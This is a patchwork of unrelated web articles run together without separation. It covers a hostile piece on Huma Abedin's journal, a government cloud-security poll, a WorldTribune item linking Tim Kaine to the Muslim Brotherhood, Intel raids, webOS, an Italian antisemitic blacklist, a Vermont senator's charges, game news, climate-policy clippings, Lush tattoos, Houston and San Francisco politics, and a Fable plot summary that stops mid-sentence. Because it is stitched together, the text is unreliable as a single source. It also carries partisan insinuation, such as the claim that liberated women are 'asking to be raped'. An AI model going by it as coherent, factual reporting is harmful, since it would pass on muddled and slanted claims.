Headlined “ Women 's Rights are Islamic Rights , ” a 1996 article argues that single moms , working moms and gay couples with children should not be recognized as families . It also states that more revealing dress ushered in by women 's liberation “ directly translates into unwanted results of sexual promiscuity and irresponsibility and indirectly promote violence against women. ” In other words , sexually liberated women are just asking to be raped
“ A conjugal family established through a marriage contract between a man and a woman , and extended through procreation is the only definition of family a Muslim can accept , ” the author , a Saudi official with the Muslim World League , asserted , while warning of “ the dangers of alternative lifestyles. ” ( Abedin 's journal was founded and funded by the former head of the Muslim World League . )
“ Pushing [ mothers ] out into the open labor market is a clear demonstration of a lack of respect of womanhood and motherhood , ” it added .
Read the rest of the story here .
Cloud computing might help people work faster and smarter , but it 's not secure enough to meet government standards , according to a poll of federal IT workers .
In a survey released Thursday by Dell and Dimensional Research , nearly eight in ten government information technology workers ( 74 percent ) said that the insecurity of cloud networks would likely prevent more agencies from moving their work to those platforms .
Cloud computing certainly looks attractive to these workers : 71 percent said the cloud enabled better productivity . But lingering security concerns outweigh that appeal . Nearly nine in ten of the respondents ( 89 percent ) said that security was more important to them than convenience .
Cloud systems have been the focus of many devastating cyberattacks in recent years , but hackers are increasingly turning their attention to government servers , too—and finding targets ripe for exploitation . The June security breach at the Office of Personnel Management ( OPM ) showed that federal IT systems were badly in need of security updates . In mid-June , White House Chief Information Officer Tony Scott ordered a month-long government-wide “ cyber sprint ” to improve security practices .
Most major attacks on government and private servers alike have exploited the most common vulnerability in network security : employee carelessness . When employees choose weak passwords or open unrecognized attachments , they give hackers a way into a system that might not otherwise be vulnerable . Whether the server is run by the federal government or Amazon ‘ s highly regarded S3 service , its security is only as robust as the weakest link in its network—and hackers are getting better at casting a net wide enough to ensnare that weak link .
The responses fit a well-known pattern that has stymied IT modernization for years . The U.S. government has consistently struggled to update its computer systems and bring modern hardware and software into the federal workplace , mainly because older systems—while undoubtedly clunky and missing many features that consumers take for granted—have met demanding security standards that competing products ca n't yet match .
Government technology systems are so famously outdated that President Barack Obama ‘ s pioneering use of a BlackBerry represented a historic shift . Senior government officials had relied on the Sectera Edge , a clunky phone vetted by the National Security Agency , as safe enough for sensitive conversations . But Obama , an avowed Blackberry fan , prevailed in getting the NSA to vet and approve a modified version of the smartphone just for him .
As the new Dell–Dimensional Research poll suggests , however , similar advances into the twenty-first century will likely continue to elude the federal government .
Correction : The number of government IT workers who noted the security issues preventing cloud adoption is 74 percent .
H/T FierceGovernmentIT | Photo via hackNY/flickr ( CC BY 2.0 ) | Remix by Max Fleishman
by WorldTribune Staff , October 9 , 2016
The major media has had little to say about Democratic vice presidential nominee Tim Kaine 's long history of anti-American radical leftism and financial ties with the Muslim Brotherhood .
“ Thanks to a research memorandum prepared by Brian Burch , president of Catholic Vote , we know that Kaine has been a disciple of the anti-American international Left for nearly 40 years , ” Scott McKay wrote for The American Spectator on Oct. 7 .
Kaine has claimed the “ turning point in my life ” came in 1980 when he took a year off from Harvard Law School to take part in a Jesuit mission to Honduras .
The met Father James Carney , “ who died carrying a gun as a Cuban-trained Sandinista soldier in a failed invasion of Honduras just three years after Kaine trekked through the jungle over the border on foot to meet him in Nicaragua , ” McKay wrote .
Kaine also has ties with the Muslim Brotherhood . He appeared at a 2011 PAC dinner in honor of Jamal Barzinji , described as a founding father of the Muslim Brotherhood in the United States and a close associate of convicted Hamas fundraiser Sami al-Arian .
“ Barzinji himself had an indictment in a terror investigation scuttled by the Obama administration , ” McKay wrote .
“ Why was Kaine on hand to speak to the gathering , for the fourth time ? Money , of course , and lots of it . The PAC in question , the Muslim Brotherhood-bankrolled New Dominion PAC , had given over $ 43,000 to Kaine 's gubernatorial campaign from 2003-05 , and more than a quarter-million dollars to the Virginia Democratic Party . Other Muslim Brotherhood-affiliated entities coughed up an additional $ 9,000 to Kaine 's 2012 Senate campaign . ”
As for Father Carney , he “ renounced his American citizenship to become a Honduran in 1973 , ” McKay wrote .
As one of the leading proponents of Soviet-inspired “ liberation theology ” doctrine which synthesizes Catholic teachings with dialectical Marxism , Carney “ ultimately left the Jesuit order over an irreconcilable difference ; namely , that you ca n't be a Jesuit priest and shoot capitalist pigs at the same time . Carney 's end came , apparently , after he was captured by the Honduran army during the ill-fated Sandinista military adventure . The Hondurans treated him the way an irregular combatant can expect — he was tortured and shot , and his body dumped from a helicopter in the triple canopy jungle across the border in Nicaragua .
“ After Carney died , Kaine befriended his successor in the communist radio ministry he helped establish , Radio Progreso in the Honduran city of El Progreso . That would be Father Ismael Moreno Coto , who is better known in Latin America as Padre Melo . Kaine has maintained a long-lasting friendship with Melo and his organization , ” McKay noted .
Kaine 's Senate event hosted Padre Melo in 2014 , and issued this statement on the visit : “ I think of El Progreso every day . The people , aside from my family , are the most important in shaping who I am today . ”
After leaving Harvard with a law degree , Kaine practiced “ fair housing ” law and taught as an adjunct professor at the University of Richmond for 17 years . He entered politics as a city councilman in Richmond in 1994 and in 1998 “ managed to get himself appointed mayor of that city , a largely ceremonial position elected by the city council members ( Richmond is actually run by a city manager ) . Kaine took credit for the latter 's success and then ran for lieutenant governor , governor and senator , ” McKay wrote .
During a speech in August to the National Urban League conference in Baltimore , Kaine “ touted the fact he 'd apologized for slavery both as mayor of Richmond and governor of Virginia , and then lectured that it was time to ‘ end the era of mass incarceration ' , ” McKay wrote .
As lieutenant governor and governor of Virginia , Kaine between 2001 and 2009 “ accepted some $ 160,000 in gifts from political donors and companies regulated by that state — including an $ 18,000 Caribbean vacation , $ 5,500 in clothing and a trip to see George Mason in the 2006 NCAA Final Four , ” McKay noted .
“ Those are precisely the same kinds of gifts that former Virginia Gov . Bob McDonnell was prosecuted for taking ; McDonnell was convicted of corruption but had his case thrown out by the U.S. Supreme Court .
“ Naturally Kaine was never prosecuted by the Obama Justice Department for his status as a beneficiary . That escape was justified by the claim that Kaine never offered a quid pro quo , but then again Kaine did reappoint James Murray , who gave him the use of his villa in Mustique , to the Virginia Higher Education Commission , and he also appointed S & K Famous Brands clothier Stuart Siegal , who so generously supplemented his wardrobe , to the Virginia Racing Commission . But of course there was no quid pro quo . ”
McKay concluded that “ it 's difficult to envision why else other than a political payoff Kaine would merit the VP nod ; Virginia might be a swing state but Kaine offers little in terms of charisma , curriculum vitae , or demographics .
“ What he does offer , though , is that he 's willing to do things others won't… as you 'd expect from a long-time committed radical . ”
Share This Post ! Want to help out the Free Press in America ? If you enjoyed this article we 'd really appreciate a quick share . Every share makes a big difference and helps us focus on what we do the best : The news ! Thanks from World Tribune Editors and Correspondents !
Related
FACEBOOK Comments
Login To Your FaceBook to Make Comments
Intel could face a large fine
Chuck Mulloy , a spokesman for Intel , said the regulators raided the company 's office in Munich , Germany .
Mr Mulloy said Intel was co-operating with the investigators .
Intel has been accused of trying to abuse its dominant market position by selling its products below cost price and making cash payments to customers .
Unannounced inspections
`` I can confirm that there has been a raid on our offices in Munich , '' Mr Mulloy said .
We are fully cooperating with the inspection
PC World owner DSG
`` As is our normal practice , we are co-operating with authorities , '' he added .
The European Commission has yet to name Intel , but confirmed that officials had carried out `` unannounced inspections '' at the premises of a chipmaker .
Commission spokesman Jonathan Todd said it had reason to believe the firm in question had violated European laws on restrictive business practices .
A number of Intel 's main suppliers have also had their offices visited by inspectors .
UK retailer DSG International , which owns PC World and Currys , said Commission officials had visited its offices in Hertfordshire .
`` We are fully cooperating with the inspection , '' said a DSG spokesman .
Rival complaint
The investigation started after a complaint from Intel 's smaller rival AMD .
The initial findings of a probe by the Commission unveiled last summer concluded that the chip firm engaged in anti-competitive action to thwart AMD .
It accused the world 's largest chipmaker of giving rebates to customers provided they bought Intel products and offering incentives to companies to delay or cancel products containing AMD technology .
Intel faces a closed hearing in Brussels on 11 and 12 March on the charges .
European regulators have the power to fine Intel up to 10 % of annual turnover if they find it guilty of stifling competition .
Intel has said it is `` confident '' it had acted lawfully .
HP has finally decided the fate of webOS today , and it 's an open one : the platform will be contributed to the open source community . The company says that it will be an `` active participant and investor in the project , '' and that its ultimate goal here is to accelerate development . In other words , it does n't want to pump the amount of money into webOS that would be required to make it fully competitive , so it 's looking to the public to help make that happen .
As for Enyo — the app framework that underpins webOS 3 and the TouchPad — HP says that it will be contributed in the `` near future '' along with `` the remaining components of the user space . '' There 's no specific verbiage in HP 's press release about what wo n't be contributed , but PreCentral has learned that patents related to webOS will remain under HP control `` to protect developers . ''
It remains to be seen what ( if any ) hardware HP directly produces for the newly-opened operating system , but it says that today 's move creates `` the opportunity to significantly improve applications and web services for the next generation of devices , '' so it certainly expects someone to fill those hardware shoes — and in this model , of course , anyone will be welcome to do so .
The move feels similar to the one that Nokia made several years ago in the creation of the Symbian Foundation to foster open source development of that platform , and that did n't work out too well — it later shuttered the organization , brought Symbian 's development back in house , and ultimately announced its long-term phase-out in favor of Windows Phone . Of course , HP is n't a mobile company the same way Nokia is , so it is n't as immediately critical that it find and implement a successful mobile platform . Either way , webOS 's fight for relevance is a long , uphill one .
HP has also posted a brief set of FAQs about today 's move . Regarding the future of HP-branded webOS hardware , the company says that it will `` explore the viability of putting webOS on devices , just as we do for other leading operating systems '' — in other words , it does n't sound like there 'll be much favoritism here when it comes time to select a mobile platform ( or a printer platform ) . It also does n't sound like we should expect any new devices any time soon . For current owners , though , the good news is that they 'll `` continue to receive software improvements and updates in the future . ''
( ANSA ) - Rome , January 12 - An Italian judge on Tuesday ordered a blackout of the pro-Palestine Radio Islam website that had published a `` blacklist '' of prominent Italian Jews . The site , which included a long list of names of people in the media , acting , and business worlds , is no longer accessible following police intervention .
Rome 's preliminary investigations judge accepted a request from the prosecutor 's office for it to issue an ordinance forcing the blackout .
The list had included journalists such as Enrico Mentana and crusading anti-Mafia reporter Roberto Saviano as well as executives such as Fiat Chrysler Chairman John Elkann . One of its subtitles read `` the Jewish monopoly in the mass media in Italy '' and the page also included links to documents alleging Jewish influence in the country .
Charges against the currently unknown perpetrators could include threats and defamation aggravated by racial hatred , ANSA sources familiar with the investigation have said .
Sen . Norm McAllister ( R-Franklin District ) walks into the Franklin County Court on May 8 , 2015 . The 63-year-old senator from Highgate , Vt. is facing multiple sex charges , including sexual assault and prohibited acts .
Advertisement Vt. senator pleads not guilty to sex charges Sen. Norman H. McAllister arrested outside Statehouse Share Copy Link Copy
A Vermont Sen. Norman McAllister pleaded not guilty to three counts sexual assault and three prohibited acts at his arraignment Friday in Franklin Superior Court.Watch the WPTZ reportAccording to court documents : There are three victims involved in the case.Between April 27 , 2015 and May 4 , 2015 , McAllister is accused of soliciting the first victim for the purpose of prostitution , lewdness or assignation.Between December 1 , 2012 and December 2013 , McAllister is accused of soliciting the second victim for the purpose of prostitution , lewdness or assignation.On or about January 1 , 2014 , McAllister is alleged to have offered to transport the second victim to a place , knowingly or with reasonable cause to know that the purpose of such directing , taking or transporting prostitution , lewdness or assignation.Between January 1 , 2014 and April 1 , 2015 , McAllister allegedly engaged in a sexual act with the second victim and compelled the victim to participate without consent.Between May 1 , 2013 and September 30 , 2013 , McAllister allegedly engaged in a sexual act with the third victim and compelled the victim to participate without consent.Between May 31 , 2013 and April 30 , 2015 , McAllister allegedly engaged in a sexual act with the third victim and compelled the victim to participate without consent.The State 's Attorney 's Office said this was a fast-moving investigation . Apparently one of the victims tipped off investigators earlier this month . According to court documents , police used wire tapes and recorded phone conversations to build a case against the senator.Vermont State Police arrested McAllister ( R-Franklin District ) Thursday evening outside of the capital building.Before being taken away Thursday , McAllister , 63 , of Highgate spoke briefly with Sen. Joe Benning ( R-Caledonia ) . Benning is a private practice defense attorney and is not representing McAllister.Benning spoke with WPTZ 's Stewart Ledbetter Friday in Montpelier . Benning declined to reveal the advice he gave McAllister , instead calling McAllister a `` very hardworking member of the Senate . '' He noted McAllister must be presumed innocent until any charge is proven.Gov . Peter Shumlin said he became aware of the criminal case Tuesday afternoon , but did not know of the specific allegations until Thursday night . He called the allegations against McAllister `` extremely troubling . `` Watch : Lawmakers react to allegationsMcAllister , a successful dairy farmer , is serving his second two-year term and is one of nine Republicans in the 30-member 30 Senate . He has sponsored legislation that would require public assistance recipients to undergo drug testing.McAllister was originally charged with human trafficking , but the charge has since been dropped . Franklin County State 's Attorney Jim Hughes said the facts of the case did not meet the statute.After the arraignment , Hughes said the case will not be treated any differently because it involves a senator . He noted he has never prosecuted a 'sex-for-rent ' case.McAllister 's attorney , Brooks McArthur , spoke to the press after the arraignment . `` We have a much different version of events . We ask people not to rush to judgment and I hope in short order our side of things will come to light , '' McArthur said . If found guilty , the felony sexual assault charges carry possible life sentences .
Bulletstorm is , essentially , a symphony of violence . It 's a first-person shooter set on a resort planet overrun with mutant humans , plants and animals -- players earn bonuses for killing these monsters in creative ( meaning , grotesque and ridiculous ) ways , dubbed `` Skillshots . '' New content for the Full Clip Edition includes six new maps for the competitive Echo mode and an `` Overkill '' campaign option that starts players off with unrestricted weapons and Skillshots .
On top of the new and pre-existing content , a Full Clip Edition pre-order bonus lets fans play as Duke Nukem instead of series star Grayson Hunt .
The Duke tie-in is n't completely random : The Full Clip Edition comes from the publishing arm of Borderlands and Duke Nukem studio Gearbox , in partnership with original Bulletstorm developer People Can Fly . Plus , someone named `` Nukem '' definitely fits in a world where players murder enemies using moves called `` Ding Dong , '' `` Man-Toast , '' `` Assplosion , '' `` Double Penetration '' and `` Dino-Sore . ''
Gearbox unveiled the remastered Bulletstorm during the pre-show for The Game Awards , which you can watch live ( at least for the moment ) right here .
George Zimmerman — who was acquitted of killing an unarmed black teen — said he was punched in the face for allegedly bragging about the fatal shooting .
Zimmerman called 911 to report that he was assaulted by a man at a restaurant in Sanford , Florida , over the weekend where he was discussing the 2012 death of 17-year-old Trayvon Martin .
Zimmerman , 32 , told authorities the man approached his table and said , “ You 're bragging about that ? ” and punched him .
“ He recognized me , ” Zimmerman told dispatchers . “ He told me he was going to kill me , he told me he 'd [ expletive ] shoot me and he punched me in the face . ”
Witnesses at the Gators Riverside restaurant confirmed the assault to authorities , reported WFTV .
Zimmerman reportedly feared for his life .
“ He said he 's going to kill me , ” Zimmerman said . “ You need to send like three or four cops . ”
Rand Paul : Rich are paying their fair share
Sen. Rand Paul ( R-Ky. ) said Sunday that the rich were paying their fair share in taxes and , in fact , were probably paying more than their fair share .
Paul pushed back against Democratic concerns that the wealthiest Americans were not paying enough in taxes .
`` We have to start with the facts on whether the rich are paying their fair share . We hear that over and over again , 'the rich are not paying their fair share , ' '' Paul said on CNN 's `` State of the Union . '' “ The top 1 percent , the millionaires in our country , pay on average 29 percent of their income . That 's what they pay on average . The average carpenter who makes $ 50,000 to $ 75,000 a year pays between 15 percent and 18 percent . The top 50 percent of wage earners pay 96 percent of the income tax . ''
`` The rich and the middle class are paying their fair share , '' Paul said , prompting host Candy Crowley to quip , `` If they pay . ''
`` The vast majority are , though . There are anomalies , there are aberrations , '' he replied .
Written by Dr. Benny Peiser , GWPF , guest post on September 3 , 2015 . Posted in The Latest news
Denmark 's widening budget deficit is forcing its policymakers to take some hard decisions in the very area where they are considered global role models : the fight against climate change . Denmark 's Liberal government is to reverse ambitious CO2 emission targets introduced by the previous administration . It will also drop plans to phase out coal-fired power plants and become fossil-fuel free by 2050 , according to leaked documents first reported by newspaper Information . The news about Denmark 's cost-cutting measures , which also include a reduction in green funding initiatives worth 340 million kroner ( $ 51.5 million ) through 2019 , came on the same day on which U.S. President Barack Obama issued a global appeal for urgent action in the buildup to a United Nations summit in Paris in December . —Peter Levring , Bloomberg , 1 September 2015
A subsidy for green heating systems worth more than ¬£400m a year is set to be pruned in the autumn spending review as ministers seek to rein back spending at the Department of Energy and Climate Change . Officials have also proposed earmarking some of the money Decc gives to the International Climate Fund — amounting to ¬£335m in 2015 . Meanwhile , Decc is playing down a rumour that it could be merged into another ministry , the business department , for example , to cut costs . “ I 'd strongly , strongly steer you away from that , ” said one insider . –Jim Pickard and Pilita Clark , Financial Times , 3 September 2015
More than one million solar energy projects and 25,000 wind turbines are obviously not enough : Despite Germany 's green energy revolution , the federal government 's climate targets can not be achieved . This is the result of the most recent update of the so-called Energiewende-Index by consulting firm McKinsey . The reduction of greenhouse gas emissions by 40 percent by 2020 compared to 1990 is “ unrealistic ” , says the report . Any improvement is not in sight either , the authors conclude : “ The prospects for a turnaround by 2020 are permanently bad. ” –Daniel Wetzel , Die Welt , 3 September 2015
The Dutch government said Tuesday it plans to appeal against a court decision which ordered it to slash emissions , arguing the verdict could set a precedent for courts to interfere with government policy . In a June 24 ruling , a court in The Hague ordered the government to cut greenhouse gas emissions by 25 percent by 2020 , saying that the more modest 17 percent cuts that it was expected to achieve by that year were not enough to combat global warming . Wilma Mansveld , the Dutch environment minister , sent a letter to the Dutch parliament announcing the cabinet would appeal against the ruling , arguing that the verdict constrains the state 's ability to make decisions by balancing competing interests . –Kalina Oroschakov , Politico , 1 September 2015
Diplomats tasked with forging a climate rescue pact expressed frustration Wednesday over the lagging progress , with only seven negotiating days left until a Paris conference which must seal the deal . “ I think we are all equally frustrated at the pace of the negotiations currently , ” Amjad Abdulla of the Maldives , who speaks for the Alliance of Small Island States ( AOSIS ) , told AFP . Instead of rolling up sleeves and reworking the text , still over 80 pages long and littered with contradictory proposals , the Bonn session had seen “ conceptual discussions , going around in circles , ” he said . —AFP , 2 September 2015
Frustrated by slow progress in global climate talks , United Nations Secretary-General Ban Ki-moon plans to invite around 40 world leaders including President Barack Obama and German Chancellor Angela Merkel to a closed- door meeting next month . Major players including India , Indonesia and Brazil still have n't submitted their climate plans , and the draft text for the Paris agreement remains an 88-page grab bag of conflicting options that negotiators still must sort out . At a news conference in Paris last week , Ban urged them to pick up the pace . “ We have only less than a hundred days for final negotiations , ” Ban said , complaining that diplomats were still working on a “ business-as-usual ” schedule . “ They have been repeating what they have been doing during the last 20 years . We do n't have time to waste. ” –Ewa Krukowska and Alex Nussbaum , Bloomberg , 1 September 2015
In Why Are We Waiting ? ( a follow-up to his well known Review of 2006 ) , Nicholas Stern assembles scientific , moral and economic arguments that rapid and radical reductions of greenhouse gas emissions are needed to limit global warming to 2¬∞C above pre-industrial temperatures , and wonders why progress is so slow . Stern 's book is not reliable on either science or policy . In Chapter 4 Stern tells us that current economic models of climate impacts are not alarming enough . But in the end , the book 's main weakness is its failure to answer the question ‘ Why Are We Waiting ? ‘ –Ruth Dixon , My Garden Pond blog , 1 September 2015
Be Social And Share ! Twitter
Facebook
LinkedIn
Pinterest
Reddit
More
Telegram
Skype
WhatsApp
Print
Pocket
Tumblr
If you 've ever plopped a Lush bath bomb in your tub and watched it magically turn what was once water into rainbow milk ( if you will ) , then you know how obsessed people can get over them . Equally addicting ? Tattoos . Marry those two together and what do you get ? Nine of the Lush 's employees ( aka Lushies ) in Lancaster , Pennsylvania , who , according to PopSugar , got inked because they love the brand .
`` One shift , we were talking about how much the brand has had an impact on us , '' one Lushie , Brittney Minor , told the website . `` I mentioned I wanted to get a tattoo to celebrate , and they all jumped at the idea . '' Apparently they were all inked by one of Brittney 's tattoo artist friends , Shelby Golob of Blackthorn Gallery in Camp Hill , Pennsylvania , and each chose a different work of Lush art to show their appreciation for their employer . Think their signature circular bath bomb , a flamingo-shaped bath bomb , sprigs of lavender , and more ; keep scrolling to see the tats for yourself !
One employee got Lush 's signature Sex Bomb Bath Bomb inked on their arm :
Courtesy Image
Another employee was inspired by the Pink Flamingo Reusable Bubble Bar , which turns your boring bath into the equivalent of a bubble factory :
Courtesy Image
This tat is in honor of Lush 's All Good Things Perfume :
Courtesy Image
Another employee got sprigs of lavender on the back of their arm , since the brand often uses this calming ingredient in their blends :
Courtesy Image
One employee got the French Kiss Bubble Bar on their ankle , which turns your bath into a relaxing lavender oasis :
Courtesy Image
This tat represents the brand 's Leaping Bunny symbol and Lush 's loyalty to be cruelty-free :
Courtesy Image
Another employee got a picture of a bear with `` Trophy Wife '' tattooed on a banner around its neck , which was inspired by Lush 's first documentary : Trophy . The film reveals how thousands of grizzly bears are killed yearly for entertainment .
Courtesy Image
This tattoo was prompted by the fan-favorite bath bomb called `` Twilight , '' thanks to the moon and stars etched in it :
Courtesy Image
And the last two tattoos represent the brand 's loyalty to being 80 percent vegan ( first pic ) and 100 percent vegetarian ( second pic ) :
Courtesy Image
Courtesy Image
Jury 's out on whether or not more Lush-inspired tattoos will surface , but according to PopSugar , Brittney shared the finished works in one of Lush 's private Facebook groups and received major support from other employees . `` I was overwhelmed by the 'likes ' and comments from Lushies across North America saying how they now want to get Lush tattoos , too , '' she told the site .
Here 's to loving anything as much as these Lushies love their job !
Get non-boring fashion and beauty news directly in your feed . Follow Facebook.com/CosmoBeauty .
Follow Carly on Twitter and Instagram .
Mayor Annise Parker announced this week she wo n't revive HERO . Now , it will be up to the next mayor to deal with the issue—if he chooses .
After voters resoundingly rejected the Houston Equal Rights Ordinance , or HERO , Mayor Parker hinted that she might try to bring up another equal rights ordinance for a vote by the City Council .
“ I do n't really want to leave a whole lot of contentious items for the next administration , ” she said after a recent city council meeting . “ I 'm going to try not to leave this one as well . ”
But she now says after consulting with council members , she wo n't try to revive HERO before she leaves office in January .
That means it will be up to the next mayor to decide whether the city will take another shot at implementing an equal rights ordinance .
That will be either Sylvester Turner or Bill King . They received the most votes in the general election and are now facing off in a December 12 runoff .
King has been criticized for not taking a clear stance on HERO but he has said he did n't like the ordinance as written . He now says he is concerned about the message HERO 's repeal sent about Houston .
“ I think we need some time to heal the bruised feelings on both sides , ” King said . “ But I absolutely intend to call all the stakeholders together at some point in time and begin a discussion about how do we best go about demonstrating to the rest of the world the kind of city Houston really is . ”
Sylvester Turner has supported the equal rights ordinance throughout his campaign . But he sounds less inclined to bring it back — even a modified version — saying the voters have spoken .
“ This is a democratic process , ” Turner said . “ The people voted on Nov. 3 , and I think it 's important now to deal with a whole host of issues that are important to every Houstonian . ”
Mayor Parker has said that she could see the ordinance being reintroduced in different segments — maybe initially leaving out the part about public accommodations , which would include restrooms .
Experts agree that HERO lost at the polls because opponents ' claims that it would allow men into women 's bathrooms resonated with voters .
Houston is the largest U.S. city without a non-discrimination ordinance .
The elderly Chinese men and women who gather each morning in Portsmouth Square for their tai chi routines would seem to have little to do with a proposed hotel , office and condo complex a half-mile away at First and Mission streets .
But in compact San Francisco , where high end and low end mingle cheek by jowl , the shadows that the proposed 2 million-square-foot Oceanwide Center at 50 First St. would cast on two Chinatown open spaces have emerged as the biggest political hurdle to the approval of what would probably be downtown San Francisco 's last mega-project .
Designed by British Pritzker Prize-winning architect Norman Foster , Oceanwide Center would include a 905-foot skyscraper with more than 1 million square feet of office space and 19 floors of condominiums . A second , shorter tower would contain 169 hotel rooms with an additional 154 condos . The taller of the two buildings would be the city 's second tallest , topped only by the Salesforce Tower , which is under construction at 101 First St. and will reach 970 feet .
For boosters of the nascent Transbay Transit District , the Oceanwide Center is key not just for the office space , hotel rooms and housing units it would generate , but also for the hundreds of millions of dollars in taxes and fees it would pump into the struggling Transbay Transit Center , a project the city is bailing out with a $ 260 million loan .
The project , which heads to the Planning Commission on Thursday for approval , would generate $ 117 million in one-time impact fees , which would probably be paid in November , when Oceanwide is expecting to obtain construction permits . In addition , it would pay about $ 647 million in Mello-Roos special taxes over 30 years , which would fund infrastructure in the Transbay district , including a possible Caltrain rail extension into the Transit Center .
1984 proposition in play
But critics argue that economic benefits do n't justify a violation of 1984 's Proposition K — the “ Sunlight Ordinance ” — which blocks construction of any building over 40 feet that casts an adverse shadow on Recreation and Park Department property unless the Planning Commission decides the shadow is insignificant .
The project would throw a shadow on Portsmouth Square between 8:05 and 9:10 a.m. from late October to early February . It would shadow St. Mary 's Square , also in Chinatown , in March and September . It would also shadow Justin Herman Plaza , at the foot of Market Street , from mid-October to late February , and Union Square from early May to early August .
“ It really clobbers Portsmouth Square , ” said Allan Low , an attorney and a member of the Recreation and Park Commission .
After six months of negotiating with the city , Oceanwide Holdings — a Chinese developer that also has projects in New York and Los Angeles — has agreed to mitigate the shadows with a $ 12 million endowment for recreation and parks programming in Chinatown , a fund that will help pay for amenities like sports , after-school programs and senior fitness programs , said Low , who helped hammer out the deal .
Needed funding
“ I am loath to negotiate a cash-for-shadow deal , but to their credit , Oceanwide did recognize the significant impact their project will have on Portsmouth Square and the Chinatown parks , ” he said .
He said funding for programming is desperately needed .
“ We can build the parks , but we have to have money for programs and services for the people in the parks , ” Low said . “ For the majority of people in Chinatown , the parks and recreation centers are the only open spaces to go outside of their SRO rooms . ”
The commitment to Chinatown recreation is not enough to appease those who have fought to keep shadows out of city parks . Bill Maher , a former supervisor and director of the Department of Parking and Traffic who wrote Prop . K , said trading shadows for dollars is “ flatly illegal. ” Prop . K 's shadow-limiting powers are clear , he said .
“ Planners have completely disregarded the voters ' decision on Prop . K , ” Maher said . “ They have simply administratively overruled the voters . They have changed the rules , without legal authority , to say the economic value of the project is the driving force . If that is the case , no park will survive . ”
He added : “ Once you build a building , you can never get the park back . Downtown will become a perennial wind tunnel of darkness . ”
Attorney Sue Hestor , who also worked on Prop . K legislation , agreed .
Housing concerns , too
“ Everyone throws money at things , but shadows are shadows , ” said Hestor , who has long been involved in battles over development . “ Portsmouth Square is the living room for people who live in 10-by-10 rooms , ” she said .
In addition to the shadow issue , Oceanwide has faced blowback from affordable housing proponents , who contend the project will exacerbate already inflated housing prices . The Oceanwide project will probably stand out even in a neighborhood becoming defined by high-end buildings like Lumina and Millennium Tower . Plans call for a a 17,000-square-foot , ultra-luxury penthouse at the top of the taller tower , the city 's largest . No price has been set , but it is likely to surpass the $ 49 million being asked for the 15,000-square-foot penthouse at nearby Lumina .
To meet that headwind , Oceanwide has agreed to pay $ 40 million for off-site affordable housing , $ 33 million of which would go toward making permanent existing affordable housing stock within a mile of the project , according to Jeff Buckley , senior housing policy director for Mayor Ed Lee .
“ Over the past several months , Oceanwide has worked closely with affordable housing and park advocates on a comprehensive community benefits package that will improve Chinatown parks and allow the city to secure affordable housing sites and SRO hotels within a 1-mile radius of the project , ” said Boe Hayward , who led the negotiations on behalf of Oceanwide .
Stabilizing residential hotels
The $ 33 million would target apartment buildings and residential hotels in Chinatown , an area that is increasingly attractive to investors looking to take advantage of the city 's astronomical rents .
“ We felt they could do more , and to their credit , they understood that , ” Buckley said . “ We have invested a lot of money in stabilizing SROs in the Mission and the Tenderloin and Sixth Street . Chinatown we have not invested in , largely because it was n't necessary . But in the last few years we have seen a dramatic rent increase for vacant units in Chinatown . We want to make sure the housing stock will remain affordable . ”
An additional $ 7 million would go to new construction of affordable housing at Fourth and Folsom streets , a parcel owned by the Metropolitan Transportation Commission .
“ The craziness of the real estate market is impacting us in ways that we have not seen before , ” said Malcolm Yeung , deputy director of the Chinatown Community Development Center . “ This will allow us to stabilize some Chinatown buildings in ways that have not done before . ”
And the project is big in more than just size . If approved , Oceanwide Center would be the last major office development passed until next year , because it alone will eat up two-thirds of the 1.5 million square feet of office space available for 2016 under the Proposition M office-space cap passed by voters in 1986 .
“ It 's sort of the swan song in terms of big downtown projects because there are not that many sites , ” said Josh Switzky , who heads up citywide planning for the Planning Department .
J.K. Dineen is a San Francisco Chronicle staff writer . Email : jkdineen @ sfchronicle.com Twitter : @ SFjkdineen
I 'm going to summarize the plot of Fable . Especially intuitive readers might be able to discern my feelings towards the story along the way .
Note : Total spoilers !
The game starts of with your character in a perfectly nice little village where nothing bad ever happens . By the time you 're done setting up the controls bandits have arrived , murdering and burning as bandits tend to do . Your nameless protagonist is rescued from the carnage by a man named Maze .
Maze brings you to the “ Heroes Guild ” , a place that takes in children and trains them to be nondescript heroes with no particular goals outside of going out and kicking as much ass as possible . In the first half hour of the game ( a sort of tutorial ) you grow from a little boy into a man . Nobody else seems to age , or indeed even move from their given spot .
They make no effort to teach any sort of moral code or even instill a basic allegiance to the guild itself . When your nameless orphan hero graduates , the guildmaster mentions that the graduates may choose good or evil . He does n't seem to care one way or the other . despite the fact that he , and everyone else involved with the place , seem to prefer good people to evil . I guess it never occurs to any of them during the decade-long training process that they might be able to influence which way students choose to go .
Once graduation is over , you take a few jobs from the guild . Maze reappears and hints that your sister – who you saw for about twelve seconds at the start of the game – might still be alive ! You fight your way through an army of bandits , and liberate her . She is so glad to see her brother that she delivers a little cryptic plot exposition and then wanders off . Looks like the bad guy ( she never gets around to telling you WHO ) murdered your father , then captured and tortured your mother and sister . He also blinded your sister .
You eventually learn that the guy behind all of this is named ( Sigh ) Jack of Blades .
Maze gives you a few more hints about what you need to do next , and you eventually rescue your mother , who has been a prisoner for the last decade or more , and who has been regulrly tortured for most of that time . She joins you , and the two of you fight your way out of the dungeon . You hack your way through dozens of minions , but just before you reach daylight Jack of Blades appears ! He teleports in with a grand total of four henchmen .
Now , taking into account the following :
You 've just killed an army of these henchmen . They are not a serious threat to you . You are at last face-to-face with your enemy who killed your father , tortured your blah blah blah . This guy has been a phenomenal jerk to you all your life , and this is your first chance at revenge . You have your long-lost mother with you . This is her first chance at freedom since you were a child . You are an amazing badass . The most powerful hero in a generation . Your mother was once a member of the Heroes Guild , and quite the butt-kicker herself in her day . In fact , when it comes to having the title of world-champion badass , she 's the one who held the title before you .
Taking all these facts into account , you… surrender . ( The game does n't give you a choice . It 's a cutscene . )
You and your mother are then thrown back into prison where everyone enjoys another round of torture . Actually , a year of it . Then you escape . With your mother . For whatever reason , Jack of Blades does n't teleport in , and you make it to freedom this time .
Your mother then wanders off to figure out how to locate Jack of Blades .
Later you arrive at the Heroes Guild . Jack of Blades ( JoB ) then teleports in , recaptures your mother , and teleports away .
You then catch Maze ( the guy who rescued you at the start of the game ) trying to recapture your blind sister . He reveals he 's been working for JoB all along ! JoB needs the blood of your sister , your mother , and you , in order to get the Uber-Sword so he can DESTROY THE WORLD . It turns out the attack on your hometown years ago was done in order to capture the three of you . Even though he orchestrated the attack , ( at the bidding of JoB ) Maze spared you and took you to the Heroes Guild . But now that you know the truth , he decides he must kill you .
Let 's back up and see if we can figure out what Maze is doing :
